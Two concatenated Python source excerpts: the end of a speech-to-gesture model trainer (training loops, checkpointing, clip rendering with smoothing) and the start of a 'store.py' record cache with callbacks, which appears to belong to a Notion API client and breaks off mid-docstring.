self.meta_info['iter'] += 1
print('\riter {:>3}/{} took {:>4} seconds\t'.
format(self.meta_info['iter'], num_batches, int(np.ceil(time.time() - start_time))), end='')
batch_s2ag_loss /= num_batches
self.epoch_info['mean_s2ag_loss'] = batch_s2ag_loss
self.show_epoch_info()
self.io.print_timer()
# self.adjust_lr_s2ag()
def per_val_epoch(self):
self.s2ag_generator.eval()
self.s2ag_discriminator.eval()
batch_s2ag_loss = 0.
num_batches = self.num_val_samples // self.args.batch_size + 1
start_time = time.time()
self.meta_info['iter'] = 0
for extended_word_seq, vec_seq, audio,\
mfcc_features, vid_indices in self.yield_batch(train=False):
with torch.no_grad():
loss, *_ = self.forward_pass_s2ag(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=False)
# Compute statistics
batch_s2ag_loss += loss
self.iter_info['s2ag_loss'] = loss
self.iter_info['lr_gen'] = '{:.6f}'.format(self.lr_s2ag_gen)
self.iter_info['lr_dis'] = '{:.6f}'.format(self.lr_s2ag_dis)
self.show_iter_info()
self.meta_info['iter'] += 1
print('\riter {:>3}/{} took {:>4} seconds\t'.
format(self.meta_info['iter'], num_batches, int(np.ceil(time.time() - start_time))), end='')
batch_s2ag_loss /= num_batches
self.epoch_info['mean_s2ag_loss'] = batch_s2ag_loss
if self.epoch_info['mean_s2ag_loss'] < self.best_s2ag_loss and \
self.meta_info['epoch'] > self.min_train_epochs:
self.best_s2ag_loss = self.epoch_info['mean_s2ag_loss']
self.best_s2ag_loss_epoch = self.meta_info['epoch']
self.s2ag_loss_updated = True
else:
self.s2ag_loss_updated = False
self.show_epoch_info()
self.io.print_timer()
def train(self):
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
if self.args.s2ag_load_last_best:
s2ag_model_found = self.load_model_at_epoch(epoch=self.args.s2ag_start_epoch)
            if not s2ag_model_found and self.args.s2ag_start_epoch != 'best':
                print('Warning! Model not found at epoch {}. '
                      'Trying to load best known model for s2ag: '.format(self.args.s2ag_start_epoch),
                      end='')
s2ag_model_found = self.load_model_at_epoch(epoch='best')
self.args.s2ag_start_epoch = self.best_s2ag_loss_epoch if s2ag_model_found else 0
print('loaded.')
if not s2ag_model_found:
print('Warning! Starting at epoch 0')
self.args.s2ag_start_epoch = 0
else:
self.args.s2ag_start_epoch = 0
for epoch in range(self.args.s2ag_start_epoch, self.args.s2ag_num_epoch):
self.meta_info['epoch'] = epoch
# training
self.io.print_log('s2ag training epoch: {}'.format(epoch))
self.per_train_epoch()
self.io.print_log('Done.')
# validation
            if (epoch % self.args.val_interval == 0) or (
                    epoch + 1 == self.args.s2ag_num_epoch):
self.io.print_log('s2ag val epoch: {}'.format(epoch))
self.per_val_epoch()
self.io.print_log('Done.')
# save model and weights
if self.s2ag_loss_updated or (epoch % self.args.save_interval == 0 and epoch > self.min_train_epochs):
torch.save({'gen_model_dict': self.s2ag_generator.state_dict(),
'dis_model_dict': self.s2ag_discriminator.state_dict()},
jn(self.args.work_dir_s2ag, 'epoch_{:06d}_loss_{:.4f}_model.pth.tar'.
format(epoch, self.epoch_info['mean_s2ag_loss'])))
def generate_gestures(self, samples_to_generate=10, randomized=True, load_saved_model=True,
s2ag_epoch='best', make_video=False, calculate_metrics=True):
if load_saved_model:
s2ag_model_found = self.load_model_at_epoch(epoch=s2ag_epoch)
            assert s2ag_model_found, 'Speech to emotive gestures model not found'
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
self.trimodal_generator.eval()
self.s2ag_generator.eval()
self.s2ag_discriminator.eval()
batch_size = 2048
losses_all_trimodal = AverageMeter('loss')
joint_mae_trimodal = AverageMeter('mae_on_joint')
accel_trimodal = AverageMeter('accel')
losses_all = AverageMeter('loss')
joint_mae = AverageMeter('mae_on_joint')
accel = AverageMeter('accel')
start_time = time.time()
for sample_idx in np.arange(0, samples_to_generate, batch_size):
samples_curr = np.arange(sample_idx, sample_idx + min(batch_size, samples_to_generate - sample_idx))
words, aux_info, word_seq_tensor, word_seq_lengths, extended_word_seq, \
pose_seq, vec_seq, target_seq, audio, spectrogram, mfcc_features, vid_indices = \
self.return_batch(samples_curr, randomized=randomized)
with torch.no_grad():
loss_dict, losses_all_trimodal, joint_mae_trimodal,\
accel_trimodal, losses_all, joint_mae, accel = \
self.forward_pass_s2ag(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=False,
target_seq=target_seq, words=words, aux_info=aux_info,
save_path=self.args.video_save_path,
make_video=make_video, calculate_metrics=calculate_metrics,
losses_all_trimodal=losses_all_trimodal,
joint_mae_trimodal=joint_mae_trimodal, accel_trimodal=accel_trimodal,
losses_all=losses_all, joint_mae=joint_mae, accel=accel)
end_idx = min(samples_to_generate, sample_idx + batch_size)
# print metrics
loss_dict = {'loss_trimodal': losses_all_trimodal.avg, 'joint_mae_trimodal': joint_mae_trimodal.avg,
'loss': losses_all.avg, 'joint_mae': joint_mae.avg}
elapsed_time = time.time() - start_time
if self.evaluator_trimodal and self.evaluator_trimodal.get_no_of_samples() > 0:
frechet_dist_trimodal, feat_dist_trimodal = self.evaluator_trimodal.get_scores()
            print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f}, '
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg, accel_trimodal.avg,
frechet_dist_trimodal, feat_dist_trimodal,
elapsed_time))
loss_dict['frechet_trimodal'] = frechet_dist_trimodal
loss_dict['feat_dist_trimodal'] = feat_dist_trimodal
else:
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg,
elapsed_time))
if self.evaluator and self.evaluator.get_no_of_samples() > 0:
frechet_dist, feat_dist = self.evaluator.get_scores()
            print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f}, '
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all.avg, joint_mae.avg, accel.avg,
frechet_dist, feat_dist, elapsed_time))
loss_dict['frechet'] = frechet_dist
loss_dict['feat_dist'] = feat_dist
else:
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all.avg,
joint_mae.avg,
elapsed_time))
end_time = time.time()
print('Total time taken: {:.2f} seconds.'.format(end_time - start_time))
def render_clip(self, data_params, vid_name, sample_idx, samples_to_generate,
clip_poses, clip_audio, sample_rate, clip_words, clip_time,
test_samples=None, clip_idx=0, unit_time=None, speaker_vid_idx=0, check_duration=True,
fade_out=False, make_video=False, save_pkl=False):
        # skip clips not in the requested test set; render everything if no set is given
        if test_samples is not None and \
                '{}_{:.2f}_{:.2f}'.format(vid_name, clip_time[0], clip_time[1]) not in test_samples:
            return [], [], []
start_time = time.time()
mean_dir_vec = np.squeeze(np.array(self.s2ag_config_args.mean_dir_vec))
clip_poses_resampled = resample_pose_seq(clip_poses, clip_time[1] - clip_time[0],
self.s2ag_config_args.motion_resampling_framerate)
target_dir_vec = convert_pose_seq_to_dir_vec(clip_poses_resampled)
target_dir_vec = target_dir_vec.reshape(target_dir_vec.shape[0], -1)
target_dir_vec -= mean_dir_vec
n_frames_total = len(target_dir_vec)
# check duration
if check_duration:
clip_duration = clip_time[1] - clip_time[0]
if clip_duration < data_params['clip_duration_range'][0] or \
clip_duration > data_params['clip_duration_range'][1]:
return None, None, None
# synthesize
for selected_vi in range(len(clip_words)): # make start time of input text zero
clip_words[selected_vi][1] -= clip_time[0] # start time
clip_words[selected_vi][2] -= clip_time[0] # end time
out_list_trimodal = []
out_list = []
n_frames = self.s2ag_config_args.n_poses
clip_length = len(clip_audio) / sample_rate
seed_seq = target_dir_vec[0:self.s2ag_config_args.n_pre_poses]
# pre seq
pre_seq_trimodal = torch.zeros((1, n_frames, self.pose_dim + 1))
if seed_seq is not None:
pre_seq_trimodal[0, 0:self.s2ag_config_args.n_pre_poses, :-1] = \
torch.Tensor(seed_seq[0:self.s2ag_config_args.n_pre_poses])
# indicating bit for seed poses
pre_seq_trimodal[0, 0:self.s2ag_config_args.n_pre_poses, -1] = 1
pre_seq = torch.zeros((1, n_frames, self.pose_dim + 1))
if seed_seq is not None:
pre_seq[0, 0:self.s2ag_config_args.n_pre_poses, :-1] = \
torch.Tensor(seed_seq[0:self.s2ag_config_args.n_pre_poses])
# indicating bit for seed poses
pre_seq[0, 0:self.s2ag_config_args.n_pre_poses, -1] = 1
# target seq
target_seq = torch.from_numpy(target_dir_vec[0:n_frames]).unsqueeze(0).float().to(self.device)
spectrogram = None
# divide into synthesize units and do synthesize
if unit_time is None:
unit_time = self.s2ag_config_args.n_poses / \
self.s2ag_config_args.motion_resampling_framerate
stride_time = (self.s2ag_config_args.n_poses - self.s2ag_config_args.n_pre_poses) / \
self.s2ag_config_args.motion_resampling_framerate
if clip_length < unit_time:
num_subdivisions = 1
else:
num_subdivisions = math.ceil((clip_length - unit_time) / stride_time) + 1
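        # Sliding-window synthesis: each window covers n_poses frames
        # (unit_time seconds) and advances by n_poses - n_pre_poses frames
        # (stride_time seconds), so consecutive windows overlap by n_pre_poses
        # frames that seed the next generation step.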
spectrogram_sample_length = int(round(unit_time * sample_rate / 512))
audio_sample_length = int(unit_time * sample_rate)
end_padding_duration = 0
# prepare speaker input
if self.s2ag_config_args.z_type == 'speaker':
if speaker_vid_idx is None:
speaker_vid_idx = np.random.randint(0, self.s2ag_generator.z_obj.n_words)
print('vid idx:', speaker_vid_idx)
speaker_vid_idx = torch.LongTensor([speaker_vid_idx]).to(self.device)
else:
speaker_vid_idx = None
print('Sample {} of {}'.format(sample_idx + 1, samples_to_generate))
print('Subdivisions\t|\tUnit Time\t|\tClip Length\t|\tStride Time\t|\tAudio Sample Length')
print('{:>12d}\t|\t{:>9.4f}\t|\t{:>11.4f}\t|\t{:>11.4f}\t|\t{:>19d}'.
format(num_subdivisions, unit_time, clip_length,
stride_time, audio_sample_length))
out_dir_vec_trimodal = None
out_dir_vec = None
for sub_div_idx in range(0, num_subdivisions):
sub_div_start_time = min(sub_div_idx * stride_time, clip_length)
sub_div_end_time = min(sub_div_start_time + unit_time, clip_length)
if sub_div_start_time >= sub_div_end_time:
continue
# prepare spectrogram input
in_spec = None
# prepare audio input
audio_start = math.floor(sub_div_start_time / clip_length * len(clip_audio))
audio_end = audio_start + audio_sample_length
in_audio_np = clip_audio[audio_start:audio_end]
if len(in_audio_np) < audio_sample_length:
if sub_div_idx == num_subdivisions - 1:
end_padding_duration = audio_sample_length - len(in_audio_np)
in_audio_np = np.pad(in_audio_np, (0, audio_sample_length - len(in_audio_np)),
'constant')
in_mfcc = torch.from_numpy(
cmn.get_mfcc_features(in_audio_np, sr=sample_rate,
num_mfcc=self.data_loader['train_data_s2ag'].num_mfcc if self.args.train_s2ag else
self.data_loader['test_data_s2ag'].num_mfcc)).unsqueeze(0).to(self.device).float()
in_audio = torch.from_numpy(in_audio_np).unsqueeze(0).to(self.device).float()
# prepare text input
word_seq = DataPreprocessor.get_words_in_time_range(word_list=clip_words,
start_time=sub_div_start_time,
end_time=sub_div_end_time)
extended_word_indices = np.zeros(n_frames) # zero is the index of padding token
word_indices = np.zeros(len(word_seq) + 2)
word_indices[0] = self.lang_model.SOS_token
word_indices[-1] = self.lang_model.EOS_token
frame_duration = (sub_div_end_time - sub_div_start_time) / n_frames
print('Subdivision {} of {}. Words: '.format(sub_div_idx + 1, num_subdivisions), end='')
for w_i, word in enumerate(word_seq):
print(word[0], end=', ')
idx = max(0, int(np.floor((word[1] - sub_div_start_time) / frame_duration)))
extended_word_indices[idx] = self.lang_model.get_word_index(word[0])
word_indices[w_i + 1] = self.lang_model.get_word_index(word[0])
print('\b\b', end='.\n')
in_text_padded = torch.LongTensor(extended_word_indices).unsqueeze(0).to(self.device)
# prepare target seq and pre seq
if sub_div_idx > 0:
target_seq = torch.zeros_like(out_dir_vec)
start_idx = min(n_frames_total, n_frames * (sub_div_idx - 1))
end_idx = min(n_frames_total, n_frames * sub_div_idx)
target_seq[0, :(end_idx - start_idx)] = torch.from_numpy(
target_dir_vec[start_idx:end_idx]) \
.unsqueeze(0).float().to(self.device)
pre_seq_trimodal[0, 0:self.s2ag_config_args.n_pre_poses, :-1] = \
out_dir_vec_trimodal.squeeze(0)[-self.s2ag_config_args.n_pre_poses:]
# indicating bit for constraints
pre_seq_trimodal[0, 0:self.s2ag_config_args.n_pre_poses, -1] = 1
pre_seq[0, 0:self.s2ag_config_args.n_pre_poses, :-1] = \
out_dir_vec.squeeze(0)[-self.s2ag_config_args.n_pre_poses:]
# indicating bit for constraints
pre_seq[0, 0:self.s2ag_config_args.n_pre_poses, -1] = 1
pre_seq_trimodal = pre_seq_trimodal.float().to(self.device)
pre_seq = pre_seq.float().to(self.device)
out_dir_vec_trimodal, *_ = self.trimodal_generator(pre_seq_trimodal,
in_text_padded, in_audio, speaker_vid_idx)
out_dir_vec, *_ = self.s2ag_generator(pre_seq, in_text_padded, in_mfcc, speaker_vid_idx)
out_seq_trimodal = out_dir_vec_trimodal[0, :, :].data.cpu().numpy()
out_seq = out_dir_vec[0, :, :].data.cpu().numpy()
# smoothing motion transition
if len(out_list_trimodal) > 0:
last_poses = out_list_trimodal[-1][-self.s2ag_config_args.n_pre_poses:]
# delete last 4 frames
out_list_trimodal[-1] = out_list_trimodal[-1][:-self.s2ag_config_args.n_pre_poses]
n = len(last_poses)
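            # Linear cross-fade over the n overlapping frames: the previous
            # window's pose is weighted (n - j) / (n + 1) and the new window's
            # pose (j + 1) / (n + 1), avoiding a visible jump at the seam.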
for j in range(n):
prev_pose = last_poses[j]
next_pose = out_seq_trimodal[j]
out_seq_trimodal[j] = prev_pose * (n - j) / (n + 1) + next_pose * (j + 1) / (n + 1)
out_list_trimodal.append(out_seq_trimodal)
if len(out_list) > 0:
last_poses = out_list[-1][-self.s2ag_config_args.n_pre_poses:]
# delete last 4 frames
out_list[-1] = out_list[-1][:-self.s2ag_config_args.n_pre_poses]
n = len(last_poses)
for j in range(n):
prev_pose = last_poses[j]
next_pose = out_seq[j]
out_seq[j] = prev_pose * (n - j) / (n + 1) + next_pose * (j + 1) / (n + 1)
out_list.append(out_seq)
# aggregate results
out_dir_vec_trimodal = np.vstack(out_list_trimodal)
out_dir_vec = np.vstack(out_list)
# fade out to the mean pose
if fade_out:
n_smooth = self.s2ag_config_args.n_pre_poses
start_frame = len(out_dir_vec_trimodal) - \
int(end_padding_duration / data_params['audio_sr']
* self.s2ag_config_args.motion_resampling_framerate)
end_frame = start_frame + n_smooth * 2
if len(out_dir_vec_trimodal) < end_frame:
out_dir_vec_trimodal = np.pad(out_dir_vec_trimodal,
[(0, end_frame - len(out_dir_vec_trimodal)), (0, 0)],
mode='constant')
out_dir_vec_trimodal[end_frame - n_smooth:] = \
np.zeros(self.pose_dim) # fade out to mean poses
n_smooth = self.s2ag_config_args.n_pre_poses
start_frame = len(out_dir_vec) - \
int(end_padding_duration /
data_params['audio_sr'] * self.s2ag_config_args.motion_resampling_framerate)
end_frame = start_frame + n_smooth * 2
if len(out_dir_vec) < end_frame:
out_dir_vec = np.pad(out_dir_vec, [(0, end_frame - len(out_dir_vec)), (0, 0)],
mode='constant')
out_dir_vec[end_frame - n_smooth:] = \
np.zeros(self.pose_dim) # fade out to mean poses
# interpolation
y_target = target_dir_vec[start_frame:end_frame]
y_trimodal = out_dir_vec_trimodal[start_frame:end_frame]
y = out_dir_vec[start_frame:end_frame]
x = np.array(range(0, y.shape[0]))
w = np.ones(len(y))
w[0] = 5
w[-1] = 5
co_effs_target = np.polyfit(x, y_target, 2, w=w)
fit_functions_target = [np.poly1d(co_effs_target[:, k])
for k in range(0, y_target.shape[1])]
interpolated_y_target = [fit_functions_target[k](x)
for k in range(0, y_target.shape[1])]
# (num_frames x dims)
interpolated_y_target = np.transpose(np.asarray(interpolated_y_target))
co_effs_trimodal = np.polyfit(x, y_trimodal, 2, w=w)
fit_functions_trimodal = [np.poly1d(co_effs_trimodal[:, k])
for k in range(0, y_trimodal.shape[1])]
interpolated_y_trimodal = [fit_functions_trimodal[k](x)
for k in range(0, y_trimodal.shape[1])]
# (num_frames x dims)
interpolated_y_trimodal = np.transpose(np.asarray(interpolated_y_trimodal))
co_effs = np.polyfit(x, y, 2, w=w)
fit_functions = [np.poly1d(co_effs[:, k]) for k in range(0, y.shape[1])]
interpolated_y = [fit_functions[k](x) for k in range(0, y.shape[1])]
# (num_frames x dims)
interpolated_y = np.transpose(np.asarray(interpolated_y))
target_dir_vec[start_frame:end_frame] = interpolated_y_target
out_dir_vec_trimodal[start_frame:end_frame] = interpolated_y_trimodal
out_dir_vec[start_frame:end_frame] = interpolated_y
        filename_prefix = '{}_s{}_{:.2f}_{:.2f}'.format(
            vid_name, speaker_vid_idx.item() if speaker_vid_idx is not None else 'NA',
            clip_time[0], clip_time[1])
sentence_words = []
for word, _, _ in clip_words:
sentence_words.append(word)
sentence = ' '.join(sentence_words)
# make a video
if make_video:
aux_str = '({}, time: {}-{})'.format(vid_name,
str(datetime.timedelta(seconds=clip_time[0])),
str(datetime.timedelta(seconds=clip_time[1])))
create_video_and_save(
self.args.video_save_path, self.best_s2ag_loss_epoch, filename_prefix, 0, target_dir_vec,
out_dir_vec_trimodal, out_dir_vec, mean_dir_vec, sentence,
audio=clip_audio, aux_str=aux_str, clipping_to_shortest_stream=True,
delete_audio_file=False)
print('Rendered {} of {} videos. Last one took {:.2f} seconds.'.
format(sample_idx + 1, samples_to_generate, time.time() - start_time))
out_dir_vec_trimodal = out_dir_vec_trimodal + mean_dir_vec
out_poses_trimodal = convert_dir_vec_to_pose(out_dir_vec_trimodal)
out_dir_vec = out_dir_vec + mean_dir_vec
out_poses = convert_dir_vec_to_pose(out_dir_vec)
# save pkl
if save_pkl:
save_dict = {
'sentence': sentence, 'audio': clip_audio.astype(np.float32),
'out_dir_vec': out_dir_vec_trimodal, 'out_poses': out_poses_trimodal,
'aux_info': '{}_{}_{}'.format(vid_name, speaker_vid_idx, clip_idx),
'human_dir_vec': target_dir_vec + mean_dir_vec,
}
with open(jn(self.args.video_save_path,
'{}_trimodal.pkl'.format(filename_prefix)), 'wb') as f:
pickle.dump(save_dict, f)
save_dict = {
'sentence': sentence, 'audio': clip_audio.astype(np.float32),
'out_dir_vec': out_dir_vec, 'out_poses': out_poses,
'aux_info': '{}_{}_{}'.format(vid_name, speaker_vid_idx, clip_idx),
'human_dir_vec': target_dir_vec + mean_dir_vec,
}
with open(jn(self.args.video_save_path,
'{}_s2ag.pkl'.format(filename_prefix)), 'wb') as f:
pickle.dump(save_dict, f)
return clip_poses_resampled, out_poses_trimodal, out_poses
def generate_gestures_by_dataset(self, dataset, data_params, check_duration=True,
samples=None, randomized=True, fade_out=False,
load_saved_model=True, s2ag_epoch='best',
make_video=False, save_pkl=False):
if load_saved_model:
s2ag_model_found = self.load_model_at_epoch(epoch=s2ag_epoch)
            assert s2ag_model_found, 'Speech to emotive gestures model not found'
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
self.trimodal_generator.eval()
self.s2ag_generator.eval()
self.s2ag_discriminator.eval()
overall_start_time = time.time()
if dataset.lower() == 'ted_db':
if 'clip_duration_range' not in data_params.keys():
data_params['clip_duration_range'] = [5, 12]
            lmdb_env = lmdb.open(data_params['env_file'], readonly=True, lock=False)
            clip_vid_name = ''
            clip_frames_all = [-2, -2]
with lmdb_env.begin(write=False) as txn:
keys = [key for key, _ in txn.cursor()]
samples_to_generate = len(keys)
print('Total samples to generate: {}'.format(samples_to_generate))
for sample_idx in range(samples_to_generate): # loop until we get the desired number of results
# if sample_idx < 11200:
# continue
# select video
if randomized:
key = np.random.choice(keys)
else:
key = keys[sample_idx]
buf = txn.get(key)
video = pyarrow.deserialize(buf)
vid_name = video[6]['vid']
if not(samples is None or any(vid_name in filename_prefix for filename_prefix in samples)):
continue
clip_poses = video[1]
clip_audio = video[3]
clip_words = video[0]
clip_frames = [video[6]['start_frame_no'], video[6]['end_frame_no']]
clip_time = [video[6]['start_time'], video[6]['end_time']]
if vid_name != clip_vid_name or clip_frames[0] - 1 > clip_frames_all[1]:
if clip_vid_name != '':
if randomized:
speaker_vid_idx = np.random.randint(0, self.test_speaker_model.n_words)
else:
speaker_vid_idx = 0
                        _ = self.render_clip(data_params, clip_vid_name, sample_idx,
samples_to_generate, clip_poses_all, clip_audio_all,
data_params['audio_sr'], clip_words_all, clip_time_all,
test_samples=samples, speaker_vid_idx=speaker_vid_idx,
check_duration=check_duration, fade_out=fade_out,
make_video=make_video, save_pkl=save_pkl)
clip_vid_name = vid_name
clip_poses_all = video[1]
clip_audio_all = video[3]
clip_words_all = video[0]
clip_frames_all = [video[6]['start_frame_no'], video[6]['end_frame_no']]
clip_time_all = [video[6]['start_time'], video[6]['end_time']]
else:
frame_idx_last = clip_frames[0] - clip_frames_all[0]
clip_poses_all = np.concatenate((clip_poses_all[:frame_idx_last], clip_poses), axis=0)
                    clip_audio_all = np.concatenate((clip_audio_all[:int(
                        (clip_time[0] - clip_time_all[0]) * data_params['audio_sr'])], clip_audio))
for word in clip_words:
if word not in clip_words_all:
clip_words_all.append(word)
clip_frames_all[1] = clip_frames[1]
clip_time_all[1] = clip_time[1]
elif dataset.lower() == 'genea_challenge_2020':
file_names = ['.wav'.join(f.split('.wav')[:-1]) for f in os.listdir(jn(data_params['data_path'], 'audio'))]
file_names.sort()
samples_to_generate = len(file_names)
print('Total samples to generate: {}'.format(samples_to_generate))
joint_indices_to_keep = [0, 4, 6, 7, 9, 10, 11, 28, 29, 30]
for f_idx, f in enumerate(file_names):
audio, sample_rate = librosa.load(jn(data_params['data_path'], 'audio', f + '.wav'),
mono=True, sr=16000, res_type='kaiser_fast')
j_names, _, _, joint_positions, _, frame_rate =\
MoCapDataset.load_bvh(jn(data_params['data_path'], 'bvh_raw', f + '.bvh'))
joint_positions_max = np.power(10., np.ceil(np.log10(np.max(joint_positions))))
joint_positions_min = np.min(joint_positions)
if joint_positions_min >= 0:
joint_positions_min = 0.
else:
joint_positions_min = -np.power(10., np.ceil(np.log10(np.abs(joint_positions_min))))
joint_positions_scaled =\
2. * (joint_positions - joint_positions_min) / (joint_positions_max - joint_positions_min) - 1.
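                # Min-max scale joint positions to [-1, 1], using power-of-10
                # bounds (presumably to keep the scaling stable across clips
                # with slightly different raw ranges).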
with open(jn(data_params['data_path'], 'transcripts', f + '.json'), 'r') as jf:
data_dump = json.load(jf)
transcript = []
for json_data in data_dump:
words_with_timings = json_data['alternatives'][0]['words']
for word in words_with_timings:
transcript.append([word['word'],
float(word['start_time'][:-1]), float(word['end_time'][:-1])])
clip_time = [0., len(joint_positions) / np.round(frame_rate)]
if randomized:
speaker_vid_idx = np.random.randint(0, self.test_speaker_model.n_words)
else:
speaker_vid_idx = 0
clip_poses_resampled, out_poses_trimodal, out_poses =\
self.render_clip(data_params, f, f_idx, samples_to_generate,
joint_positions_scaled[:, joint_indices_to_keep],
audio, sample_rate, transcript, clip_time,
clip_idx=0, speaker_vid_idx=speaker_vid_idx,
check_duration=check_duration, fade_out=fade_out,
make_video=make_video, save_pkl=save_pkl)
end_time = time.time()
print('Total time taken: {:.2f} seconds.'.format(end_time - overall_start_time))
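

# A minimal standalone sketch (not part of the original class) of the
# endpoint-weighted quadratic smoothing used in the fade-out step above:
# fit a degree-2 polynomial per output dimension over the fade window, with
# heavier weights on the endpoints so the blend stays anchored to them.
def _smooth_fade_window(y):
    """y: (num_frames, dims) array; returns the per-dimension quadratic fit."""
    x = np.arange(y.shape[0])
    w = np.ones(len(y))
    w[0] = w[-1] = 5  # pin the fit to the window's first and last frames
    co_effs = np.polyfit(x, y, 2, w=w)  # shape (3, dims)
    return np.transpose(np.asarray([np.poly1d(co_effs[:, k])(x)
                                    for k in range(y.shape[1])]))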
|
store.py | import datetime
import json
import threading
import uuid
from collections import defaultdict
from copy import deepcopy
from dictdiffer import diff
from inspect import signature
from threading import Lock
from pathlib import Path
from tzlocal import get_localzone
from .logger import logger
from .settings import CACHE_DIR
from .utils import extract_id
class MissingClass(object):
def __bool__(self):
return False
Missing = MissingClass()
class Callback(object):
    def __init__(
        self, callback, record, callback_id=None, extra_kwargs=None, watch_children=True
    ):
        self.callback = callback
        self.record = record
        self.callback_id = callback_id or str(uuid.uuid4())
        # avoid a shared mutable default argument
        self.extra_kwargs = extra_kwargs or {}
def __call__(self, difference, old_val, new_val):
kwargs = {}
kwargs.update(self.extra_kwargs)
kwargs["record"] = self.record
kwargs["callback_id"] = self.callback_id
kwargs["difference"] = difference
kwargs["changes"] = self.record._convert_diff_to_changelist(
difference, old_val, new_val
)
logger.debug("Firing callback {} with kwargs: {}".format(self.callback, kwargs))
# trim down the parameters we'll be passing, to include only those the callback will accept
params = signature(self.callback).parameters
if not any(["**" in str(param) for param in params.values()]):
# there's no "**kwargs" in the callback signature, so remove any unaccepted params
for arg in list(kwargs.keys()):
if arg not in params:
del kwargs[arg]
# perform the callback, gracefully handling any exceptions
try:
# trigger the callback within its own thread, so it won't block others if it's long-running
threading.Thread(target=self.callback, kwargs=kwargs, daemon=True).start()
except Exception as e:
logger.error(
"Error while processing callback for {}: {}".format(
repr(self.record), repr(e)
)
)
def __eq__(self, val):
if isinstance(val, str):
return self.callback_id.startswith(val)
elif isinstance(val, Callback):
return self.callback_id == val.callback_id
else:
return False
class RecordStore(object):
def __init__(self, client, cache_key=None):
self._mutex = Lock()
self._client = client
self._cache_key = cache_key
self._values = defaultdict(lambda: defaultdict(dict))
self._role = defaultdict(lambda: defaultdict(str))
self._collection_row_ids = {}
self._callbacks = defaultdict(lambda: defaultdict(list))
self._records_to_refresh = {}
self._pages_to_refresh = []
with self._mutex:
self._load_cache()
def _get(self, table, id):
return self._values[table].get(id, Missing)
    def add_callback(self, record, callback, callback_id=None, extra_kwargs=None):
assert callable(
callback
), "The callback must be a 'callable' object, such as a function."
self.remove_callbacks(record._table, record.id, callback_id)
callback_obj = Callback(
callback, record, callback_id=callback_id, extra_kwargs=extra_kwargs
)
self._callbacks[record._table][record.id].append(callback_obj)
return callback_obj
def remove_callbacks(self, table, id, callback_or_callback_id_prefix=""):
"""
Remove all callbacks for the record specified by `table` and `id` that have a callback_id
starting with the string `callback_or_callback_id_prefix`, or are equal to the provided callback.
"""
if callback_or_callback_id_prefix is None:
return
callbacks = self._callbacks[table][id]
while callback_or_callback_id_prefix in callbacks:
callbacks.remove(callback_or_callback_id_prefix)
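    # Note: the `in` test and list.remove above work on plain strings because
    # Callback.__eq__ treats a string operand as a callback_id prefix
    # (startswith match), so passing "" removes every callback for the record.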
def _get_cache_path(self, attribute):
return str(
Path(CACHE_DIR).joinpath("{}{}.json".format(self._cache_key, attribute))
)
def _load_cache(self, attributes=("_values", "_role", "_collection_row_ids")):
if not self._cache_key:
return
for attr in attributes:
try:
with open(self._get_cache_path(attr)) as f:
if attr == "_collection_row_ids":
self._collection_row_ids.update(json.load(f))
else:
for k, v in json.load(f).items():
getattr(self, attr)[k].update(v)
except (FileNotFoundError, ValueError):
pass
def set_collection_rows(self, collection_id, row_ids):
if collection_id in self._collection_row_ids:
old_ids = set(self._collection_row_ids[collection_id])
new_ids = set(row_ids)
added = new_ids - old_ids
removed = old_ids - new_ids
for id in added:
self._trigger_callbacks(
"collection",
collection_id,
[("row_added", "rows", id)],
old_ids,
new_ids,
)
for id in removed:
self._trigger_callbacks(
"collection",
collection_id,
[("row_removed", "rows", id)],
old_ids,
new_ids,
)
self._collection_row_ids[collection_id] = row_ids
self._save_cache("_collection_row_ids")
def get_collection_rows(self, collection_id):
return self._collection_row_ids.get(collection_id, [])
def _save_cache(self, attribute):
if not self._cache_key:
return
with open(self._get_cache_path(attribute), "w") as f:
json.dump(getattr(self, attribute), f)
def _trigger_callbacks(self, table, id, difference, old_val, new_val):
for callback_obj in self._callbacks[table][id]:
callback_obj(difference, old_val, new_val)
def get_role(self, table, id, force_refresh=False):
self.get(table, id, force_refresh=force_refresh)
return self._role[table].get(id, None)
def get(self, table, id, force_refresh=False):
id = extract_id(id)
# look up the record in the current local dataset
result = self._get(table, id)
# if it's not found, try refreshing the record from the server
if result is Missing or force_refresh:
if table == "block":
self.call_load_page_chunk(id)
else:
self.call_get_record_values(**{table: id})
result = self._get(table, id)
return result if result is not Missing else None
def _update_record(self, table, id, value=None, role=None):
callback_queue = []
with self._mutex:
if role:
logger.debug("Updating 'role' for {}/{} to {}".format(table, id, role))
self._role[table][id] = role
self._save_cache("_role")
if value:
logger.debug(
"Updating 'value' for {}/{} to {}".format(table, id, value)
)
old_val = self._values[table][id]
difference = list(
diff(
old_val,
value,
ignore=["version", "last_edited_time", "last_edited_by"],
expand=True,
)
)
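                # Illustrative dictdiffer output (values are hypothetical):
                #   list(diff({'title': 'A'}, {'title': 'B'}, expand=True))
                #   -> [('change', 'title', ('A', 'B'))]
                # The ignore list keeps bookkeeping fields (version,
                # last_edited_*) from firing callbacks on every round-trip.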
self._values[table][id] = value
self._save_cache("_values")
if old_val and difference:
logger.debug("Value changed! Difference: {}".format(difference))
callback_queue.append((table, id, difference, old_val, value))
# run callbacks outside the mutex to avoid lockups
for cb in callback_queue:
self._trigger_callbacks(*cb)
def call_get_record_values(self, **kwargs):
"""
Call the server's getRecordValues endpoint to update the local record store. The keyword arguments map
table names into lists of (or singular) record IDs to load for that table. Use True to refresh all known
records for that table.
